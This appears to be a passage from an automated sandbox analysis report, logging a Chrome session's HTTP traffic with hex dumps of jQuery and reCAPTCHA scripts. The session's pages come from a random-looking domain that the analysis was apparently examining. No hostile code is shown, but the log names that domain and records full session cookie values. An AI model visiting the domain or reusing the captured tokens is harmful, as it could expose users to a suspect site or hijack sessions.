                                                                                                                                                                                                                                                                  2024-10-29 19:09:58 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                                                                                                                                                  Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  47192.168.2.1649760142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:58 UTC728OUTGET /recaptcha/api.js?render=explicit HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                  Referer: https://usqe.bin4tgla.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:58 UTC749INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:09:58 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:58 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=300
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:09:58 UTC629INData Raw: 35 39 63 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                                                                                                                                                                                                  Data Ascii: 59c/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                                                                                                                                                                                                  2024-10-29 19:09:58 UTC814INData Raw: 4a 30 4c 52 69 76 44 37 67 6c 63 41 55 41 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 29 7b 76 2e 63 6f 6f 6b 69 65 44 65 70
                                                                                                                                                                                                                                                                  Data Ascii: J0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDep
                                                                                                                                                                                                                                                                  2024-10-29 19:09:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  48192.168.2.1649763151.101.66.1374437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:59 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                                  Host: code.jquery.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:59 UTC612INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Content-Length: 89501
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                                                  ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:59 GMT
                                                                                                                                                                                                                                                                  Age: 1245861
                                                                                                                                                                                                                                                                  X-Served-By: cache-lga21931-LGA, cache-dfw-kdfw8210079-DFW
                                                                                                                                                                                                                                                                  X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                  X-Cache-Hits: 2, 111
                                                                                                                                                                                                                                                                  X-Timer: S1730228999.184418,VS0,VE0
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  2024-10-29 19:09:59 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                                  2024-10-29 19:09:59 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                                                                                                                                                  Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                                                                                                                                                  2024-10-29 19:09:59 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                                                  Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                                                                                                                                                  2024-10-29 19:09:59 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                                                                                                                                                                  Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                                                                                                                                                  2024-10-29 19:09:59 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                                                                                                                                                  Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                                                                                                                                                                  2024-10-29 19:09:59 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                                                                                                                                                  Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  49192.168.2.1649762142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:09:59 UTC463OUTGET /recaptcha/api.js?render=explicit HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:09:59 UTC749INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:09:59 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:09:59 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=300
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:09:59 UTC629INData Raw: 35 39 63 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                                                                                                                                                                                                  Data Ascii: 59c/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                                                                                                                                                                                                  2024-10-29 19:09:59 UTC814INData Raw: 4a 30 4c 52 69 76 44 37 67 6c 63 41 55 41 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69 6f 6e 4c 61 62 65 6c 29 7b 76 2e 63 6f 6f 6b 69 65 44 65 70
                                                                                                                                                                                                                                                                  Data Ascii: J0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDep
                                                                                                                                                                                                                                                                  2024-10-29 19:09:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  50192.168.2.1649758104.21.85.924437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:02 UTC1322OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                                  Host: usqe.bin4tgla.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://usqe.bin4tgla.com/fpI2Ggql/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6Ink5a3lvWlZtaGdPTUdzNXNWNFkrdHc9PSIsInZhbHVlIjoiRWtVK3RlVkExNXRPYkdoY3lXTjNGUGFnVHA0SjFMMXhTMzVpbzlxQ3JzbC9hV0o2a2lwOElUaGJhN2p3ZTJncjNLZ1M2NHdBazBXTUkrQU45c2FJdGNHN3RBSHJtbEZDMVRXT2dYOEVKdmVXbFFBdktPNWoyeXdwckhuaU95cHQiLCJtYWMiOiI5ZGUyMzkxNDc4NzQ2YTczYmI5YjE3ODYwMzMzMWMzNGU3MGY3ZTU2NGYxZmZlYjE4Mzg1MmUzNGY3NjY3MjE0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkdKZTFpa3A0RzhTUEJNaCtwZ1ZUeWc9PSIsInZhbHVlIjoiam5sUXVYVk1Na200QWpnbmdySVMxQk1HdExOcXlFdzhPMFZ1ZDBMZDN4TDRjaC9nanRWaVVRYk5FWU9HSFJvWTBxdHZKUzZGRzJCYkFUOFVUMC9WZXNoTWFaZUQzNjlUZ0s5a2k2OTY4TlRlYTZCOUxSaEE2Rm11d3hhUk1aZU4iLCJtYWMiOiI2Y2Y0ODgwMjlmYThiNWY0Mjc3Y2U4NDcyMmUwZWExZjFjNDQ5Nzk0MWMxOTZmZGU0Mzc4ODE0YmJjZmNkMDkzIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                                                  2024-10-29 19:10:02 UTC1030INHTTP/1.1 404 Not Found
